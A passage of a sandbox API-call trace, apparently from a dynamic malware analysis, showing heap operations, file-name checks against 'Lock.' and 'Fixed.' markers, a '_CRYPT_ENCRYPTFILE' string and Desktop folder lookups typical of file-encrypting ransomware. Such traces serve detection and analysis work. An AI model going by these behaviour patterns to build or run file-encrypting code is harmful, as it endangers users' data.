dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0135.663] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0135.663] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.663] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0135.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0135.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0135.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alm7UiDYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lm7UiDYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m7UiDYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7UiDYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UiDYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iDYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DYbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YbRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bRcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RcNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cNr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nr.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0135.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0135.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0135.665] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0135.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0135.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0135.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0135.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0135.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0135.665] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alm7UiDYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lm7UiDYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m7UiDYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7UiDYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UiDYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iDYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DYbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YbRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bRcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RcNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cNr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0135.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Nr.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0135.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0135.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0135.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0135.667] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0135.667] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0135.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0135.667] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0135.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0135.668] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0135.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0135.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0135.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0135.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0135.670] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0135.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0135.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0135.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0135.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0135.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0135.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0135.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.671] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0135.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0135.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0135.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0135.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0135.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0135.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0135.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0135.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 